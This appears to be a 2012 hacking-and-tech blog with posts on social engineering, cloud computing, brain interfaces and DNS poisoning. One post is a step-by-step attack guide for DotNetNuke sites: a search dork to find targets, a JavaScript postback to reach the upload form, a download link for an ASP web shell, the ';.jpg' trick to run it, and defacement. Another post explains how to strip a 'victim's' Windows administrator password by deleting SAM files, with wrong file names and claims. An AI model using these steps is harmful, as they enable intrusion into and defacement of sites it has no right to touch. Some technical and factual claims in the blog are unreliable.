techgeenix

What Is Social Engineering?

geenix — Wed, 12 Sep 2012 15:20:28 GMT

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.

A social engineer runs what used to be called a "con game." For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network's security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access. Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques.

Social engineering is a component of many, if not most, types of exploits. Virus writers use social engineering tactics to persuade people to run malware-laden email attachments, phishers use social engineering to convince people to divulge sensitive information, andscareware vendors use social engineering to frighten people into running software that is useless at best and dangerous at worst.

Another aspect of social engineering relies on people's inability to keep up with a culture that relies heavily on information technology. Social engineers rely on the fact that people are not aware of the value of the information they possess and are careless about protecting it. Frequently, social engineers will search dumpsters for valuable information, memorize access codes by looking over someone's shoulder (shoulder surfing), or take advantage of people's natural inclination to choose passwords that are meaningful to them but can be easily guessed.

Security experts propose that as our culture becomes more dependent on information, social engineering will remain the greatest threat to any security system. Prevention includes educating people about the value of information, training them to protect it, and increasing people's awareness of how social engineers operate.

What Is Social Engineering?

geenix — Wed, 12 Sep 2012 15:19:38 GMT

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.
A social engineer runs what used to be called a "con game." For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network's security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access. Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques.
Social engineering is a component of many, if not most, types of exploits. Virus writers use social engineering tactics to persuade people to run malware-laden email attachments, phishers use social engineering to convince people to divulge sensitive information, andscareware vendors use social engineering to frighten people into running software that is useless at best and dangerous at worst.
Another aspect of social engineering relies on people's inability to keep up with a culture that relies heavily on information technology. Social engineers rely on the fact that people are not aware of the value of the information they possess and are careless about protecting it. Frequently, social engineers will search dumpsters for valuable information, memorize access codes by looking over someone's shoulder (shoulder surfing), or take advantage of people's natural inclination to choose passwords that are meaningful to them but can be easily guessed.
Security experts propose that as our culture becomes more dependent on information, social engineering will remain the greatest threat to any security system. Prevention includes educating people about the value of information, training them to protect it, and increasing people's awareness of how social engineers operate.

DNN Attack-An Introduction

geenix — Mon, 10 Sep 2012 18:32:36 GMT

You guys must be aware of Portal attack for hacking a website. Portal hacking A.K.A. DotNetNuke(DNN) attack.

So here it is, let’s start:

1. Open google.com and type”inurl:fcklinkgallery.aspx” (this is for searching sites which are vulnarable to this attack.

2. Now select any website from the list.

3. Now add ”/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx” after the name of your website in url bar.

4. You will get a link gallery page

5. Select "file”

6. Now copy this javascript in url bar.

javascript:__doPostBack('ctlURL$cmdUpload','')

7. Now you will see an upload option. Clck on that and upload your shell ASp

You can download it from herehttp://www.ziddu.com/download/15017245/ASpShell.rar.html

8. After upload

go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg

EXample : http://ww.itservi wcespro.net/portals/0/umer.asp;.jpg

9. Now shell is in frot of you like this (screen shot)

10. Click again and again on

11. When you see this page admin area, click on upload and upload your deface index page to be shown.

PlayStation Eye will know your face and gender

geenix — Thu, 06 Sep 2012 16:09:44 GMT

Every once in a while, some new video game technology is released that could change the way games could be played. We’ve already seen the announcement from Microsoft with their Project Natal, and Sony is chiming in with its own great advancement. Sony has recently announced that the PlayStation Eye webcam is going to have face-recognition technology as well as gender recognition technology.
I believe that we have already coveredgender-recognition technology before, and Kish Hirani, Sony Europe’s head of developer services, says that it can "detect gender and even the age of the face, separate facial features such as the nose, eyes, and ears, and even detect whether you’re smiling or not”.
By the way, it is planned to work with the upcoming Sony Motion Controller, which I don’t think we have covered. It will accomplish this using the X, Y, and Z motion.
So, what are we looking at here? An age where you don’t have to use your own username, or set up an account? A time where your Sony Playstation just "looks” at you and knows you are? Does anyone else think that sounds a little scary, like Big Brother?
I mean, why not apply this technology to our webcams, and so our computers greet us with full knowledge of who we are? It sure beats the traditional Windows welcome screen. Unless, of course, you like anonymity.

How to "Delete administrator Password" without any software

geenix — Wed, 05 Sep 2012 10:06:40 GMT

Method 1

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step 1. Put your hard disk of your computer in any other pc .

Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).

Step 3. Then open that drive in which the victim’s window(or your window) is installed.

Step 4. Go to location windows->system32->config

Step 5. And delete SAM.exe and SAM.log

Step 6. Now remove hard disk and put in your computer.

Step 7. And boot your computer

All (Ctrl+Alt+Del) Permanently deleted files Recovery solution

geenix — Wed, 05 Sep 2012 10:01:21 GMT

Sometimes we delete the files permanently, and realize that deleting them is like a Blunder...
For all those folks,
Here is the solution
Software called "Kissass Undelete" , can bring those files from the hard disk or your flash drive.
Conditions : Only if the data on that drive is not re-occupied(or written). that means the space which was available after the deletion is not been occupied after the deletion.
Click Here to download the .
1)
To start searching for the files,
Select the drive from the Left panel of the Windows and Click the scan button.
the Scan might take upto 10 secs.
2)
When the files search has been completed, it will show you the results with the name, typ, size and the last modified date of the searched file.
3) Now you can select the file to be recover. This is an Open source application and available for All Windows OS(Windows XP/Vista/ 7).

DNS poisoning via Port Exhaustion

geenix — Sun, 02 Sep 2012 15:32:51 GMT

Today we are releasing a very interesting whitepaper which describes a DNS poisoning attack against stub resolvers.
It discloses two vulnerabilities:

A vulnerability in Java (CVE-2011-3552, CVE-2010-4448) which enables remote DNS poisoning using Java applets. This vulnerability can be triggered when opening a malicious webpage. A successful exploitation of this vulnerability may lead to disclosure and manipulation of cookies and web pages, disclosure of NTLM credentials and clipboard data of the logged-on user, and even firewall bypass.

A vulnerability in multiuser Windows environments which enables local DNS cache poisoning of arbitrary domains. This vulnerability can be triggered by a normal user (i.e. one with non-administrative rights) in order to attack other users of the system. A successful exploitation of this vulnerability may lead to information disclosure, privilege escalation, universal XSS and more.

The whitepaper can be found here.
A few video demos of our Proof-of-Concept:

Attack: Remote DNS poisoning via Java Applets: Cookie theft.

Environment: Ubuntu 11.04, Firefox 7.0.1. Movie link

Attack: Remote DNS poisoning via Java Apples: NTLM credentials and Clipboard theft.

Environment: Windows 2008, Internet Explorer 9. Movie link

Attack: Remote DNS poisoning via Java Applets: Firewall bypass.

Environment: Windows 2008, Firefox 7.0.1. Movie Link

Attack: Local DNS poisoning via port exhaustion. Movie link

Environment: Windows 2008

What Is Cloud Computing?

geenix — Fri, 31 Aug 2012 20:35:08 GMT

Cloud computing is a general term for anything that involves delivering hosted services over the Internet. These services are broadly divided into three categories: Infrastructure-as-a-Service (IaaS), Platform-as-a-Service (PaaS) and Software-as-a-Service (SaaS). The name cloud computing was inspired by the cloud symbol that's often used to represent the Internet in flowchart s and diagrams.
A cloud service has three distinct characteristics that differentiate it from traditional hosting. It is sold on demand, typically by the minute or the hour; it is elastic -- a user can have as much or as little of a service as they want at any given time; and the service is fully managed by the provider (the consumer needs nothing but a personal computer and Internet access). Significant innovations in virtualization and distributed computing, as well as improved access to high-speed Internet and a weak economy, have accelerated interest in cloud computing.
A cloud can be private or public. A public cloud sells services to anyone on the Internet. (Currently, Amazon Web Services is the largest public cloud provider.) A private cloud is a proprietary network or a data center that supplies hosted services to a limited number of people. When a service provider uses public cloud resources to create their private cloud, the result is called a virtual private cloud. Private or public, the goal of cloud computing is to provide easy, scalable access to computing resources and IT services.
Infrastructure-as-a-Service like Amazon Web Services provides virtual server instanceAPI ) to start, stop, access and configure their virtual servers and storage. In the enterprise, cloud computing allows a company to pay for only as much capacity as is needed, and bring more online as soon as required. Because this pay-for-what-you-use model resembles the way electricity, fuel and water are consumed, it's sometimes referred to as utility computing.
Platform-as-a-service in the cloud is defined as a set of software and product development tools hosted on the provider's infrastructure. Developers create applications on the provider's platform over the Internet. PaaS providers may use APIs, website portal s orgateway software installed on the customer's computer. Force.com, (an outgrowth of Salesforce.com) and GoogleApps are examples of PaaS. Developers need to know that currently, there are not standards for interoperability or data portability in the cloud. Some providers will not allow software created by their customers to be moved off the provider's platform.
In the software-as-a-service cloud model, the vendor supplies the hardware infrastructure, the software product and interacts with the user through a front-end portal. SaaS is a very broad market. Services can be anything from Web-based email to inventory control and database processing. Because the service provider hosts both the application and the data, the end user is free to use the service from anywhere.

Coming soon: Google on your brain

geenix — Fri, 31 Aug 2012 20:20:33 GMT

Just thinking about likely near-term innovations in computing is exciting, but slowly a longer-term vision is coming into focus.

Down the road we're probably going to have access to something approaching all information all the time. Our lives - much longer by then because of the implications of this for medical care - will be enriched, even as our behavior will be very unlike how we live today.

The other huge, and related, move of the moment is toward ultimate mobility. Several trends are taking us there. The cellphone is becoming more like a PC while the PC is becoming more like a cellphone. In short, the next great era of computing - succeeding the PC one - will likely be about smaller, cheaper, more-powerful portable devices.Already much of our software and data is moving to giant remote servers connected to the Internet. Our photos, music, software applications like Microsoft Word, and just about everything else we use a computer for will be accessible to us wherever we go.

If you wonder how devices can get smaller and yet replace the PC, keep in mind that a major innovation we're seeing right now is vastly-improved voice-recognition software. While it only works on the fast processors of a PC today, the inexorable growth of computing power will soon take that kind of power into your cellphone. So long keyboard!

In the next phase, the devices essentially disappear. An article in the new issue of Fortune by Peter Schwartz and Rita Koselka describes the amazing coming world of quantum computing.

Forget the technical details - quantum computing is tough for non-engineers to grasp. Suffice it to say that if you thought the increase in computing power was impressive during the past 20 years, the pace will likely speed up radically as quantum computing takes hold within the next decade.As part of a broader look at the future last September, I speculated that in the future we would feel that everything in life had become like an open-book test. "Any kind of information is available anytime you want it," I wrote. "Simply speak a question, or even think it. You will always be connected wirelessly to the network, and an answer will return from a vast, collectively-produced data matrix. Google queries will seem quaint."

At the time, I thought I was being a little wild, but less than a year later such talk is almost routine in the futurist camp. Chris Taylor at Business 2.0 this week published "Surfing the Web with Nothing but Brainwaves." Taylor explains that already quadriplegics can play videogames, control robotic arms, and turn a TV on and off, using only their minds. They are connected to a computer with an implant that reads electrical patterns in the brain.

Sony has already patented a game system that beams data directly into the brain without implants, reports Taylor.

In the future quantum-computing world which Schwartz and Koselka describe, we'd go way further. Computing power would be so great that we could easily have "network-enabled telepathy." We'd wear headbands with unimaginable computing power.

It's fascinating to consider some of the potential social and even political ramifications of such a turn toward ubiquitous information availability. The necessity to learn languages might disappear. If the devices necessary to participate in this information revolution were cheap enough, and the network truly ubiquitous and global, the economic playing field could be leveled. If information is power, everyone would have it. That's the kind of breakthrough the developing world needs.

Even moral codes and behavior might alter, if all that available information led to a profound transparency in human conduct. One of my beliefs is that people will routinely record their entire lives on some equivalent of video.

Sharing your personal history - warts and all - might then become routine, in order to improve your perceived trustworthiness. Computing is now so important that to talk of its future is inevitably to consider the future fate of mankind.

Hackers can pluck private data from your brain

geenix — Fri, 31 Aug 2012 07:25:31 GMT

It is very easy to hack a human brain and pluck things such as bank details from the head using technology that costs only a few hundred dollars, scientists claim.A team of researchers from the University of Oxford in Geneva and the University of California in Berkeley explained the process using an off-the-shelf Emotiv brain-computer interface that only cost a few hundred dollars. Volunteers for the security experiment were asked to wear an Emotiv BCI head piece and sat in front of a computer screen that showed images of maps, banks and card PINS. The researchers then tracked the P300 brain signal, which is given off when the brain registers meaningful stimuli. The team found they could consistently reduce the random data in each variable by 15 to 40 per cent, a marked advantage over random guessing. Subjects were essentially leaking valuable information through the BCI units, making it easier to calculate their address or bank account numbers. "The simplicity of our experiments suggests the possibility of more sophisticated attacks," Discovery News quoted the team as saying in their paper. For example, an uninformed user could be easily engaged into 'mindgames' that camouflage the interrogation of the user and make them more cooperative. Furthermore, with the ever increasing quality of devices, success rates of attacks will likely improve, they added.